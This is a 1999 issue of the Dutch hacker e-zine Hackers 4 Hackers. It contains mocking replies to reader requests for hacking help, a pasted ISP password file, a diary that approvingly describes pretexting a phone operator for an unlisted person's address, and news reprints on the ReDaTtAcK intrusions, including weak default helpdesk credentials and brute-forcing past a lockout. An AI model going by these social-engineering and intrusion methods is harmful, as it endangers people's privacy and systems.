Copy Link
Add to Bookmark
Report
Hackers 4 Hackers #4,5
Hackers 4 Hackers Issue 4,5, released on 30-10-1999
___ ___ _____ ___ ___
/ | \ / | | / | \
/ ~ \/ | |_/ ~ \
\ Y / ^ /\ Y /
\___|_ /\____ | \___|_ /
\/ |__| \/
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
|h|a|c|k|e|r|s| |4| |h|a|c|k|e|r|s| |0|4|
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
http://www.hackers4hackers.org
'30-10-1999'
Om je aan te melden bij de maillijst kan je een mailtje sturen
naar subscribe@hackers4hackers.org met als titel "subscribe h4h
emailadres"
Of je kan je online aanmelden op http://www.hackers4hackers.org
Artikelen en dergelijke kun je mailen naar post@hackers4hackers.org
Vragen kun je mailen naar de desbetreffende auteur of ook naar
post@hackers4hackers.org
Enkele interessante sites:
http://itris.eu.org
http://www.dutchthreat.nl
http://security.pine.nl
http://www.hit2000.org
http://hier.is/Triples
http://www.casema.net/~gin
01. Disclaimer....................................... (Redaktie)
02. Inleiding........................................ (Redaktie)
03. Lezers-post...................................... (Redaktie)
04. Een dagje uit het leven van een social engineer.. (Mitsai)
05. ReDaTtAcK........................................ (ZymOt1c)
06. Programmeren in Pascal 3......................... (RaViTy)
07. Evenementen...................................... (Redaktie)
08. Zipdrive crack................................... (Berry da Clown)
09. CGI exploits..................................... (Whizkid)
10. Het beveiligen van SuSE61........................ ({})
11. Gratis Internet in de bieb....................... (Linuxjunx `98)
12. Ditjes en Datjes................................. (Asby)
---------------
01. Disclaimer
---------------
We zijn niet verantwoordelijk voor datgene wat jullie met deze
informatie doen. Deze informatie dient alleen voor educationele
doeleinden. Als je in problemen komt, kan je ons niks verwijten.
Gebruik maken van deze informatie kan strafbaar zijn. Meningen
van auteurs hoeven niet hetzelfde te zijn als die van de
redactie.
--------------
02. Inleiding
--------------
Wegens verschillende redenen is deze H4H wat later uitgekomen dan
gepland was. Een van die redenen was dat Asby een van de vele ge-
wonden was, die in de IJ tunnel te val waren gekomen met de Dam
tot Dam loop. Gelukkig was er niets gebroken en hij heeft er
geen blijvend letsel aan overgehouden.
Een andere reden is, dat de vakanties weer voorbij zijn. Hier-
door hebben veel mensen het druk met school en/of werk, zodat er
weinig tijd overblijft om een artikeltje in elkaar te flansen
voor H4H. Degene die dit toch voor elkaar hebben gekregen wilde
ik bij deze bedanken.
Deze keer helaas geen Dag van een Cracker, omdat drgenius het momenteel
veel te druk heeft met andere bezigheden. Hiervoor in de plaats hebben
we nu de lezerspost en een Dag uit het leven van een SE-ster.
Tevens is er in deze H4H geen cursus Pascal, omdat RaViTy het voor elkaar
heeft gekregen om zowel zijn modem als ISDN-modem op te blazen.
De volgende H4H zal hopelijk eerder verschijnen dan deze. Er zijn al schrij-
vers bezig met interessante artikelen.
We wensen iedereen veel leesplezier toe en mochten er op of aan-
merkingen zijn, surf dan even naar onze website en vul het in bij
commentaar.
De redactie
----------------
03. Lezers-post
----------------
Ik heb en demo van en vliegsimulatie
[Ik heb een kat die heet Flappie, hoor je mij zeuren]
maar naar twee minuten stopt het programma (hij is beperkt tot twee minutjes).
[Hmmm.... had je al gezegd dat je maar twee minuten kon spelen?]
Ik heb met en Hex Editor probeered deze te craken,
[dat lukte vast niet]
maar dat lukt niet.
[inderdaad, dat zei ik al]
Kunt u mij wat advies A.U.B. geven?
[Neem een krantewijk en koop een voetbal]
Bedankt,
Jef
[Graag gedaan]
--------------
Geachte heer: mevrouw
[Laat ik hierbij meteen maar vertellen dat ik mannelijk ben, dat
scheelt weer een hoop email lezen elke dag... al die huwelijks-
aanzoeken...]
Ik zou u willen vragen om mij een mail te sturen met daarin al de adressen
waar ik programma's kan vinden om te hacken.
[Ik zou u hierbij willen zeggen dat als u wat te vragen hebt, het
ook gewoon vraagt en niet alleen zegt dat u het dolgraag wilt vragen]
Hoogachtend
[ik ben de koningin niet hoor]
Tom en Dennis
----------------
Hallo asby
[Hoi]
Ik heb 2 vraagjes: Op jouw site vertel je dat je van een
bepaalde site poorten kan scannen en kijken welke er open
staat.
[Welke site? Van H4H? Kan me anders niks herinneren...]
verderop staat een hele lijst poorten, zijn die nou
standaard ofzo?
[Ik weet niet eens over welke site je het hebt]
hoe gaat dat? kun jij mij dat beknopt uitleggen?
[nee... dat kan ik niet beknopt uitleggen]
Verder ik heb de nieuwste versie van back orifice (bo2k)
wil je hem hebben?
[Ja cool... dan krijg je van mij netbus en samen heersen we dan
over het internet.. gaan we de FBI hacken en zo.. har har har]
----------
hoi,
kan je me helpen hoe je een FTP hackt, wel een recentere versie van
Microsoft ?
[nee]
Groeten,
De Gregoriis Patrick
[stoere nick btw, wat betekend het eigenlijk? Dat je allergisch
bent voor wortels??]
------
Kunt u mij misschien een mailtje sturen met hackprogramma's
en natuurlijk de gebruiksaanwijzingen
hellwich@hotmail.com
hellwich@freemail.nl
[C:\windows>mail patch.exe to hellwich@hotmail.com
De opdracht of bestandsnaam is onjuist.
C:\windows>mail patch.exe to hellwich@freemail.nl
De opdracht of bestandsnaam is onjuist.
Sorry... wil niet lukken... jammer nu zal je nooit de populairste
jongen van de klas worden...]
--------
Hoi,
Om te beginnen: ik ben een newbie.
[Ach, zo heeft iedereen wel een excuus]
In mijn dagelijks leven (Java) programmeur, en regelmatig
bezig met internet zaken, maar vooral van UNIX e.d. heb
ik geen kaas gegeten.
[oefening baart kunst]
M'n prive-site is onlangs voor de tweede keer 'gehackt';
[das kut]
iemand heeft een fotootje van me overschreven met een porno-plaatje.
Ik kan er opzich wel om lachen, waar het niet dat (aangezien dit de
tweede keer is) iemand het mij persoonlijk heeft gemunt. Je kan dus
wel begrijpen dat ik op z'n minst nieuwschierig ben wie me dit flikt!
De beveiliging van cybercomm - mijn prive provider - stelt geen moer
voor (zie bijlage .passwd, waar ik de klanten uit heb gehaald). Omdat
ik een groentje ben weet ik echter niet waar ik moet zoeken. Ik heb wat
log-files bekeken, maar daar staan alleen de http zaken (GET's enzo) in.
Ik neem aan dat de hacker FTP heeft gebruikt.
Kun je me vertellen hoe ik kan achterhalen wie de hacker is. Ik ga er
vanuit, gezien de geringe beveiliging van Cybercomm, dat het geen
top-off-the-bill hacker is, maar gewoon een simpel ettertje.
[Volgens mij weet hij gewoon je paswoord, dus die
moet je gewoon even veranderen]
root:x:0:0:root:/:/bin/bash
sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh
diag:x:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:x:1:1:daemons:/:/dev/null
bin:x:2:2:System Tools Owner:/bin:/dev/null
uucp:x:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
sys:x:4:0:System Activity Owner:/var/adm:/bin/sh
adm:x:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp:x:9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
nuucp:x:10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico
auditor:x:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:x:12:0:Security Database Owner:/dbadmin:/bin/sh
rfindd:x:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:x:60002:60002:uid no access:/dev/null:/dev/null
nobody:x:-2:-2:original nobody uid:/dev/null:/dev/null
[en zoals het hoort, netjes geshadowed, dus niks aan het
handje...]
-----------
beste "asby"
of hoe je ook heet
[Asby is goed hoor]
ik heb een belangrijke vraag voor je:
[Of ik 1 of 2 miljoen van je wil hebben??]
Waarom is er nog steeds geen patch voor Foongrep II???
[Ehmm...
1. Wat heb ik met Foongrep te maken??
2. Ik mis het belangrijke voor mij hierin??]
Zou je dit eventueel aan je hacker-vrienden willen voorleggen?
[Nee, ze zien me al aankomen... dat je dat durft te vragen]
Kunnen zij geen patch schrijven?
[Waarom zouden ze een patch schrijven??]
Ik weet zeker dat er heel wat mensen blij zouden zijn, als
Foongrep II zou werken, zonder dat je er 25 piek voor moet
neer leggen!
[Ik heb ff gevraagd en de patch is verkrijgbaar op de H4H-website
tegen betaling van fl. 33,95]
---------------
Hi,
[Hello, leuk Engelse post]
I'm currently involved in a case against my ex partner.
And I have to prove that she is mentally instable or
else I will never see my dochter again.
[Shit happens... btw isn't it daughter??]
I know 100% sure that the info I need is in there!
[In where? Your daughter??]
I DESPERATLY NEED TO HACK INTO HER E-MAIL BOX AT HOTMAIL!
[O yeah, another request for a hotmail hack... I was wondering
where this story would end...]
(I'm so desperate I nearly shout :-( )
If you can help me or you know someone who can, please
mail me, my future with my dochter depents on it!
[Weer dochter gebruiken, waarom de rest dan wel in
het Engels??]
Daniel
wizzkid88@yahoo.com
PLEASE PLEASE PLEASE PLEASE!!!!
[Who was mentally instable, you said??]
----------------------------------------------------
04. Een dagje uit het leven van een social engineer
----------------------------------------------------
Een dagje uit het leven van een social engineer. De gsm gaat weer es,
hmz hoelaat is het? 0700 uur? aargh.. " ja met mij, klinkt het door dat
ding, ik moet vanmiddag naar de rechtbank , weet je al wat?" Ohja, even
snel uit bed springen en mn notitieboekje opzoeken,ik slap nog half.
Onderweg ff de computer aanzetten.."jah hiero heb je de info, succes he"
"thanx, klinkt het, en die info die jij zocht komt vanavond " hehe denkt
de SE, makkelijk zo, als ik het zelf niet kan vinden, ruil ik het wel.
Mooi, het is nou 8 uur, ff inbellen en inloggen op IRC, mail ophalen
enzv. hmz, nu al mp3 verzoeken? das vroeg.. ff niet dus, ben bezig eikel:)
eerst ff iets natrekken..met de gsm in de ene hand, koffie in de andere,
loopt de SE terug naar haar computer, Zo , eerst ff zitten, hmm koffie:)
"klopt dat telefoonnummer van ***?, en ik wil ook graag ff zn adres weten,
kan dat?" hhehe 118 rules echt wel. "het is n geheim nummer mevrouw", zegt
die telefoniste,"ja dat weet ik, maar ik moet! het adres weten, het nummer
heb ik toch al?""oh eh okay, maar niet zeggen hoor" hm dit is makkelijk,
denkt de SE, niet leuk meer.Ach straks een moeilijkere taak. ff chatten
met die cracker, om even wakker te worden, en ff wat bij te leren, als SE
moet ik toch ook wat afweten van cracking he. Mijn agenda staat best vol
voor vandaag, en het lijkt alsof ik nix doe, hehe, omdat ik nix deface zeker.
Wanneer zal ik es studeren dan? tussendoor dan maar ff. Eerst even een stukje
muziek erbij, lekker hard klinkt Sepultura uit de pc speakers , zo dat maakt
mn ochtend goed. De cracker is van IRC weg nu, dus ik log ook es uit....even
mijn gisteren opgespaarde info uitzoeken en noteren in Het Grote S.e Boek:)
hmmzz een paar adresse en namen , altijd handig. Sommigen gooien de info wel
erg makkelijk voor me klaar. Het archief groeit en groeit wel zo.. Hmz iemand
die me uitdaagt zijn gegevens te vinden... Ik doe eigenlijk niet aan uitda-
gingen, ik hoef nix te bewijzen voor mezelf...maar ja het is wel n goeie leer-
school, okay ff doen dan.. Eens kijken wie kan die info hebben? aha, hij, ff
aanspreken, ff vragen."ey ik moet ** ff bellen maar k ben zn nummer ff kwijt,
geef ff?" Zonder problemen wordt het gegeven.
pff ik moet eigenlijk al n uur naar de wc, toch maar ff gaan ofzo, anders moet
ik dadelijk, als het drukker is. Hey het is ook al etenstijd ofzo, nu geen
tijd, krijg net een lading info over me heengestort, die ik moet verifieren.
de gsm batterij is weer leeg, stekker erin en verder bellen, gsm is wel
onmisbaar... , hmz ff weer inloggen op IRC, beetje ontspanning is nooit weg.
Jammer alleen dat er weer een berg scriptkiddies aan mn kop zeiken. "nee ik
gebruik geen BO, nee ik zit niet in je pc, ik BEN geen cracker,nee ik ga je
vijand niet hacken, donder op" Na een zoveelste poging om uit te leggen dat
ik social engineer ben en geen cracker (nog) geef ik het op. Ik zet mn IRC op
AWAY en ga een joint bouwen en een bier halen, zo dat heb ik wel verdiend
dacht ik..
Vol goede moed begin ik maar es aan HTML om mn website te updaten, en wat
stukjes te schrijven, waar anderen om hebben gevraagd, ff meebleren met een
bevriende zanger, op mp3.
de html komt niet af, de gsm gaat weer, "wat nou weer, tis half 3 snachts"
denk ik. "hee mits, hier heb je nog wat info over die knakker die je tracede"
makkelijk zeg... dadelijk hoef ik nix meer te doen zelf, ow er staat wat
tegenover:) de beller heeft een dreigbriefje gehad van zijn baas, of ik dat
ff wil natrekken?
Sure, doe ik overdag ff .. Bedtijd! het is inmiddels half 6 sochtends eer
ik mn bed induik, met de wekker op 8 uur, aargh;) Social engineering kan erg
vermoeiend zijn, maar erg kewl:)
Mitsai
--------------
05. ReDaTtAcK
--------------
--[ ReDaTtAcK
-- Zym0t1c
/* Iedereen kent het verhaal van ReDaTtAcK. Iedereen werd ingelicht
via teevee, radio, kranten, magazines en ezines. Alle feiten netjes
op een rij...
Maar hackers, echte hackers, wisten het al. Het nieuws heet van de
naald vinden. Ja, hackers wachten niet tot het nieuws hen wordt voor-
geschoteld. Hackers gaan verder. Hackers gaan op zoek naar informatie
, to gain knowledge, naar nieuws dat voor hen belangrijk is.
's Nachts... ja, vooral 's nachts. 's Nachts schuimen ze de under-
ground nieuwssites af op zoek naar hun elementaire kennis. Ze willen
constant meer weten en op de hoogte blijven van hun wereld. En daarom
zijn hackers altijd één (grote) stap voor op de gewone dagjesmensen.
En zo zal het blijven! Punt. Andere lijn.
Ik wil iedereen de kans geven om het ReDaTtAcK verhaal eens deftig te
bestuderen en een mening te vormen over ReDaTtAcK. Wat nu volgt zijn
de nieuwsberichten die verschenen in De Cursor, www.decursor.com - één
van de betere Nederlandstalige ezines - bedankt Stijn! :), om iedereen
af te helpen van hun deelse kennis omtrent deze hacker.
Er was veel meer informatie beschikbaar, maar ja! Ergens moet toch
een lijn getrokken worden he!
De informatie tussen /* */ zijn eventuele opmerkingen van mijnentwege.
*/
// editie 236 van 2 - 8 augustus 1999
--[ HACKER BELAAGT SKYNET
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'De Belgische provider Skynet kreeg dit weekend het bezoek van een hacker.
De man heeft kredietkaartgegevens, gebruikersnamen en wachtwoorden van Skynet-
abonnees kunnen onderscheppen. Skynet geeft de fout toe en heeft de
beveiliging verscherpt.'
Het was VTM /* de Vlaamse Televisie Maatschappij */ die zondag in het
journaal met het verhaal uitpakte. De hacker is dit weekend in de
computersystemen van Skynet binnengedrongen, de porviderdochter van de
telefoonmaatschappij Belgacom en de grootste provider van België. De hacker
werkt onder de schuilnaam ReDaTtAcK en is zelf ook klant bij Skynet.
Klanten van Skynet kunnen hun toegangsabbonementen online betalen met een
VISA-kaart. De computer die deze transacties afhandelt, bleek niet goed
beveiligd waardoor ReDaTtAcK naar eigen zeggen duizende kaartnummers kon
opvragen; de woordvoerder houdt het op enkele tientallen. Ook had de man
toegang tot de wachtwoordcomputer waardoor hij alle emails kon lezen van
Skynetabonnees.
Skynet geeft toe dat er een fout gebeurd is bij de beveiliging.
Gerechterlijke stappen wil het bedrijf niet ondernemen. Een hacker heeft dan
ook meestal geen slechte bedoelingen. Het enige wat hij wil aantonen is dat
de beveiliging van computersystemen vaak de wensen overlaat, zoals we kunnen
zien aan de vraag in het logo van de hacker: "Is this security?". Meteen na
zijn ontdekking heeft ReDaTtAcK een fax verstuurd naar Skynet waarin hij de
fout beschreef. Omdat het weekend was, duurde het even vooraleer de tech-
nici van de provider konden ingrijpen. Ondertussen zou de situatie genorma-
liseerd moeten zijn maar het robuuste imago van de provider krijgt een flinke
deuk.
http://users.skynet.be/redattack/
/* Zijn site werd afgesloten voor de buitenwereld. /*
// editie 237 van 9 - 15 augustus 1999
--[ IS REDATTACK STRAFBAAR?
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'Internetprovider Skynet heeft dan toch klacht ingediend tegen hacker
ReDaTtAcK. Maar niet iedereen deelt die mening: "Elk normaal denkend bedrijf
nam zo'n man ogenblikkelijk in dienst". Is ReDaTtAcK strafbaar?'
Vorig weekend wist hacker ReDaTtAcK binnen te dringen in de computersys-
temen van Belgacom Skynet, de grootste Internetprovider van België. De
hacker kon naar eigen zeggen duizenden nummers bemachtigen van VISA-kaarten
waarmee abonnees betaald hadden. Ook vond hij een achterpoortje in de
wachtwoordcomputer van Skynet.
Skynet heeft het over 16 onderschepte kaartnummers en maximum 130 wacht-
woorden. De getroffen klanten van de provider zijn gecontacteerd en kregen
reeds een nieuw wachtwoord. Skynet diende begin deze week geen klacht in
tegen onbekenden: "De hacker heeft gebruik gemaakt van een programmeerfout
door een van onze programmeurs om zich illegaal toegang te verschaffen tot
onze nieuwe registratie-server". De fout werd ondertussen hersteld. Nu voert
het Gentse parket verder onderzoek naar die 'onbekende'.
Maar is ReDaTtAcK wel een crimineel? Een erg vreemde crimineel, want hij
stuurde zaterdag zelf een fax naar Skynet om hen de fout te melden. Het enige
wat een hacker wil aantonen is dat de beveiliging van computersystemen vaak
veel te wensen overlaat, zoals we kunnen zien aan de vraag in het logo van de
hacker "Is this security?". ReDaTtAcK ziet zichzelf als een ethische hacker
en hij somt zelf een aantal basisregels op uit de hackersdeontologie: "Kennis
misbruik je niet voor je eigen winst. Betrokken personen mogen niet direct
benadeeld worden. De media en de autoriteiten moeten steeds op de hoogte ge-
bracht worden".
Omdat de Internetwetgevind in België nog in de kinderschoenen staat, heeft
de aanklacht tegen ReDaTtAcK alleen betrekking op de telefoonwetten: de hacker
heeft via de telefoon op onregelmatige wijze vertrouwelijke informatie kunnen
bemachtigen over andere personen. Daarvoor riskeert hij geen celstraf, maar
wel een geldboeten die kan varieren van 10,000 tot 10 miljoen BEF. Minister
van Justitie Marc Verwilghen buigt zich in het najaar over de Internet-wetge-
ving. Dat wordt tijd.
In de nieuwsgroep be.providers begrijpen ze de reactie van Skynet niet.
Nieuwslezer vindt: "Hoed af voor de hacker want meestal worden deze zaken
afgekocht en gaan ze de doofpot in". Dirk Smets voegt daar toe: "Elk normaal
denkend bedrijf nam zo'n man ogenblikkelijk in dienst". En zou ReDaTtAcK een
job bij Skynet aannemen? "Geen sprake van. Daarvoor willen ze geen geld
vrijmaken want de veiligheid van hun klanten maakt hen niks.
--[ GERECHT VAT VERKEERDE HACKER
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'Het Brusselse gerecht heeft de verkeerde man verhoord over de
Skynet-inbraak. Dat meldde ReDaTtAcK zelf, de hacker die vorig weekend wist
binnen te dringen in de computersystemen van Internetprovider Skynet.
Het gerecht bevestigde de feiten.'
ReDaTtAcK woont volgens het Brusselse gerecht in de buurt van Gent. Dat
leidt men af uit de gegevens die de hacker achtergelaten zou hebben bij de
Skynet-inbraak. Maar het gerecht is de verkeerde man op het spoor. Vorige
vrijdag werd iemand ondervraagd maar het bleek niet ReDaTtAcK te zijn.
Overigens meldt ReDaTtAcK dat er enkele mensen rondlopen die zichzelf
willen voordoen als de hacker. Eerst waren er zelfs twijfels dat de site van
de .R.H.F. [zie vorig bericht] nep zou zijn. In de nieuwsgroep be.providers
vond een zekere Wim het ironisch dat een hacker nog geen website kon vinden
zonder reclame. ReDaTtAcK dient ons van antwoord: "Dat heb ik gedaan om ano-
niem te blijven. Om de twee dagen verhuist de site naar een andere plaats,
hoewel het adres wel hetzelfde blijft. Dat is een forward-adres. Ik kan ze-
ker een site vinden zonder reclame maar dat zou meer tijd vragen en die ge-
bruik ik nu voor wat hier echt belangrijk is".
De media-genieke ReDaTtAcK weet op alles een antwoord. Zou het hier
misschien, na de inbraak op de luchthaven van Zaventem, gaan om een nieuwe
stunt van de Schalkse Ruiters? Is ReDaTtAcK eigenlijk Red Michiel?
/* De Schalkse Ruiters was vroeger een BRT-programma dat af en toe een major
stunt uitvoerde in de vorm van reportages. Mensen moesten raden of die
reportages echt of vals waren. Zo zijn de Schalkse Ruiters, uitgedost als
echte piloten, gewoon tot in de cockpit kunnen binnendringen van een
vliegtuig op de luchthaven van Zaventem. Red Michiel was de man die alles
zowat organiseerde en die ook bij de meeste reportages betrokken was. /*
news://be.providers
--[ INTERVIEW: REDATTACK GAAT DOOR
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'"Ik had mezelf al lang opgespoord". Hacker ReDaTtAcK wil doorgaan met zijn
acties en staat naar zeggen op het punt het netwerk van een grote Belgische
bank te kraken. De Skynet-hack was maar een voorsmaakje. In een telefonisch
gesprek met De Cursor vertelt ReDaTtAcK waarom hij systeembeheerders dezer
dagen slapeloze nachten bezorgt.'
"Enorm veel informatie van Jan met de pet staat digitaal opgeslagen in
computernetwerken en chipkaarten. Maar die systemen zijn niet veilig genoeg.
Ik wil de mensen wakker schudden zodat ze beseffen dat hun gegevens niet vei-
lig zijn". ReDaTtAcK heeft daarvoor zijn eigen hackersgroep opgericht, de
.R.H.F. of de .ReDaTtAcK.HaCkErS.FoUnDaTiOn. De media halen is niet het enige
doel, ReDaTtAcK wil echt iets veranderd zien aan de wetgeving over de privacy
en de computercriminaliteit. De .R.H.F. gaat ook kinderporno aanpakken. Als
ze in die netwerken Belgen tegen het lijf lopen, willen ze die opsporen en
kenbaar maken op de ReDaTtAcK website.
"Men besteedt gewoon geen aandacht en geld aan de veiligheid van
computersystemen. Neem nu Skynet. Zij nemen een loopje met de privacy van
hun klanten: hun prive-gegevens kon ik publiek opvragen, via Internet dus.
Veiligheid kan er de pot op". En ook nu maakte de hacker de vergelijking met
een auto-inbraak: "Als je je auto laat openstaan op een parking, kan je een
boete krijgen van de politie. Zo moet Skynet, maar ook vele andere bedrijven
bedrijven, beboet worden als zij de privacy van hun klanten niet au serieux
nemen".
Betere beveiliging dan, maar kan je elk systeem niet kraken? "Tuurlijk wel
maar er is een groot verschil in tijd. En iedereen, waaronder Microsoft,
werkt steeds met dezelfde systemen om gegevens te versleutelen. Je kan iets
veilig noemen als het voor elk systeem uniek uitgewerkt is. Maar zoiets kost
geld, veel geld".
ReDaTtAcK wil nog van zich laten horen en zegt op het punt te staan binnen
te breken in het computernetwerk van de Belgische bank: "Dit zal groots zijn,
echt waar". En wanneer mogen we dat verwachten? "Oh, ik schat deze week of
zeker volgende week dat we erdoor zijn".
Gaat het gerecht u vinden? "Langs de ene kant hoop ik van wel, dat zou
betekenen dat men eindelijk voldoende kennis in huis heeft. Maar anderzijds
hoop ik uiteraard van niet, hoewel een geldboete van 10,000 tot 10 miljoen BEF
nog erg kan meevallen". Maar loopt de media-genieke ReDaTtAcK niet het gevaar
om verklikt te worden? "Die kans loop ik inderdaad. Maar als je iets wil
bereiken moet je iets durven riskeren".
Wij houden de komende dagen angstvallig onze bankrekeningen in het oog...
http://redattack.dyns.cx/
/* Deze site werd onlangs gekraakt door de RAAS, de Red Attack Attack Squad.
Op 30-08-99 bezocht ik deze site en kreeg een evil blue screen te zien. Iets
met Microsofts favoriete bug?
Er stond het volgende te lezen:
RED ATTACK HAS BEEN ATTACKED
BY THE REDATTACK ATTACK SQUAD
Fuck off you stupid RedAttack - you have been hacked by RAAS
You just created hoaxes and the belgian hackers community didn't like that -
where is your credibility now?
The media will be notified
Don't you feel BLUE now?
Eindelijk een serieuzere groep van hackers... :)
Please don't kill me ReDaTtAcK :) */
// editie 238 van 16 - 22 augustus 1999
--[ REDATTACK KRAAKT GENERALE BANK
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'Hacker ReDaTtAcK is er donderdag in geslaagd binnen te breken in het
computersysteem van de Generale Bank, de grootste bank van België. Daar kon
hij rekeningnummers, transacties en inlogcodes bekijken. De bank dient geen
klacht in maar biedt de hacker zelfs een baantje aan.'
Na Internetprovider Skynet was het de beurt aan de Generale Bank, onderdeel
van Fortis-bank. Via de website van G-banking /* http://www.gbanking.be */
kunnen klanten hun bankrekeningen beheren. Daarvoor krijgen ze een logincode
en wachtwoord. Als je driemaal de verkeerde combinatie ingeeft, wordt de
toegang geblokkeerd en komt je naam op een zwarte lijst te staan.
ReDaTtAcK slaagde erin de naam steeds weer uit de zwarte lijst te schrappen
waardoor hij onbeperkt kon uitproberen. Daarvoor kraakte hij de computer van
de helpdesk. Dat was erg makkelijk want de logincode van die computer was
"helpdesk" en het wachtwoord 'hlpdsk". Vervolgens schreef de hacker een
programmaatje dat alle combinaties tussen logincode en wachtwoord uitprobeerde
zonder op de zwarte lijst terecht te komen. Zo kon hij de rekeningnummers en
transacties inkijken van alle klanten die gebruik maken van het online
bankieren.
De Generale Bank geeft de kraak sportief toe maar betwijfelt dat de hacker
de rekeningsaldo's kon inkijken, zoals hij zelf beweert. Kathleen Steel van
de Generale Bank zegt dat de bank geen klacht indient tegen de hacker: "Zoals
de hacker zelf zegt, wil hij alleen maar de veiligheid verbeteren. En zolang
dat zijn doel blijft, ondernemen wij geen gerechterlijke stappen". Voor alle
veiligheid werd het elektronische bankieren voor een tijd afgesloten. De
Generale Bank voelt zich gevleid met het bezoek van ReDaTtAcK: "De hacker zegt
dat wij de best beveiligde bank zijn in Belgie". Ze hopen nu dat de hacker
bereid zal zijn om mee te helpen de veiligheid van het systeem te verbeteren.
Al bij al blijft de inbraak erg onschuldig. De hacker kon naar eigen zeg-
gen rekeningsaldo's opvragen, maar overschrijvingen heeft hij niet gedaan:
"Zover zijn we niet gegaan. We willen alleen maar lekken aantonen zonder ie-
mand schade te berokkenen".
Er komt dus geen bijkomende klacht tegen de hacker. Niet alle klanten zijn
daar even tevreden mee. In de nieuwsgroep be.providers zegt Voyager: "Ik vind
daar als klant van de Generale Bank helemaal niets sportiefs aan en eis dat
mijn bank wel een klacht zal indienen". Daarop reageert Sigi: "Zou je niet
beter klacht indienen tegen uw bank omdat ze uw informatie slecht beveiligen?
Just a thought".
--[ REDATTACK ONTMASKERD MAAR GEEFT NIET OP
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'Hacker ReDaTtAcK - in het echte leven de informaticus Frans Devaere - werd
door het Gentse parket vrijdagochtend thuis opgepakt voor ondervraging.
Vrijdagavond trad de hacker uit de anonimiteit en gaf hij toelichting op een
persconferentie. Daar maakte hij bekend dat hij er allerminst de brui aan wil
geven: "We gaan ons doel verder zetten en als het niet anders kan op een
illegale manier". Ook wil hij het Internet opsplitsen in verschillende,
opgekuiste kanalen'; vergelijk het met televisiezenders.
Een overrompeling was het, op de persbriefing waar ReDaTtAcK zijn identi-
teit zou prijsgeven. Eigenlijk had het gerecht de hacker vorige week al opge-
spoord maar moest hem toen bij gebrek aan bewijzen laten gaan. Iemand had hem
via de media herkend. Vrijdag kon Justitie de verdenking wel hard maken door
zijn telefoontjes van vorige week na te gaan. Enkele malen had hij ingebeld
bij Internetprovider Skynet waar hij beslag wist te leggen op vertrouwelijke
gegevens. Na de Skynet-kraak baande de hacker zich vorige donderdag een weg
in het computersysteem van de Generale Bank, de grootste bank van Belgie.
ReDaTtAcK riskeert een boete van 10,000 tot 10 miljoen BEF. Rond de middag
mocht hij weer gaan.
De hacker praat steeds over zijn 'filosofie': "Ik wil de mensen wakker
schudden. Hun gegevens staan op talloze computers opgeslagen die helemaal
niet goed beveiligd zijn. Ik vertrouw mijn gegevens toe aan allerlei instel-
lingen en ik wil dan ook zekerheid hebben dat mijn gegevens niet misbruikt
worden. Met onze Foundation (de .ReDaTtAcK.HaCkErS.FoUnDaTiOn. nvdr) gaan we
verder met de mensen daarvan bewust te maken. En daarnaast trekken we ten
strijde tegen al die vuiligheid op Internet zoals kinderporno".
De twee hacks - Skynet en Generale Bank - heeft hij in zijn eentje ge-
klaard. Maar momenteel telt zijn hackersvereniging al meer dan 200 leden; op-
volging is dus verzekerd. Dat zal nodig zijn want ReDaTtAcK wil doorgaan:
"We gaan verder lekken opsporen en zullen dat melden aan de bevoegde instan-
tie. Doen zij niks om met onze informatie, zullen wij zelf, desnoods ille-
gale, stappen ondernemen".
"Kijk, ik ben niet tegen evolutie. Maar evolutie moet meer doordacht
gebeuren", vertelt Frans Devaere. "Neem nu Microsoft. Dat is een commerciele
bedoening geworden. Het moet allemaal veel te rap gaan, waardoor encryptie
(en dus veiligheid nvdr) verwaarloosd wordt. Hetzelfde bij Skynet. Na 1 dag
zou hun systeem weer helemaal veilig zijn. Dat kan niet na 1 dag".
/* Komaan Franske! HACKEN!!! :) */
Heeft de hacker dan een oplossing? "Het Internet van vandaag is eigenlijk
veel te groot geworden. Je kan dat nooit controleren". De hacker pleit voor
de oprichting van verschillende, gecontroleerde en propere 'kanalen': "Zo zal
er een kanaal fun zijn, een kanaal education en dus ook een kanaal sex". Als
je dan eens surft op een kanaal, ben je zeker waar je je aan te verwachten
hebt. Maar om dat te verwezenlijken zal het Internet heel wat moeten veran-
deren.
Gegevens die veilig bewaard moeten worden, worden versleuteld of omgevormd.
Encryptie heet het dan. Maar Amerika b.v. legt een beperking op het gebruik
van encryptie. Anders kunnen gegevens het land uit zonder dat de staatsvei-
ligheid die gegevens kan inkijken omdat ze te goed versleuteld werden. De
hacker vindt het onzin en meent dat veiligheid van gegevens veel belangrijker
is dan mogelijke spionage.
Wat ga je concreet doen tegen kinderporno? Vaak staan zo'n websites in het
buitenland en daar vallen ze onder een andere wetgeving. In Japan is het
zelfs toegelaten. "Wat we gaan proberen is door de vraag te beperken, het
aanbod weg te nemen. Momenteel is de vraag naar kinderporno niet strafbaar,
alleen het aanbod. Dat vinden wij verkeerd. We gaan dan op zoek naar
Belgische Internetadressen bij de bezoekers van die pagina. Merken we dat
een bezoeker enkele malen de site geraadpleegd heeft, dan zullen wij zijn
identiteit opsporen en kenbaar maken in de media."
http://www.geocities.com/SiliconValley/Hills/3905/
--[ "SORRY JONGENS, MAAR DIE WETEN ZELFS NIET WAT EEN PC IS"
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'Hacker ReDaTtAcK was niet bepaald mals tegenover de Computer Crime Unit van
het gerecht, de cel die hem heeft opgespoord. Ook Skynet krijgt het hard te
verduren, in tegenstelling tot de Generale Bank die hij graag wil helpen. En
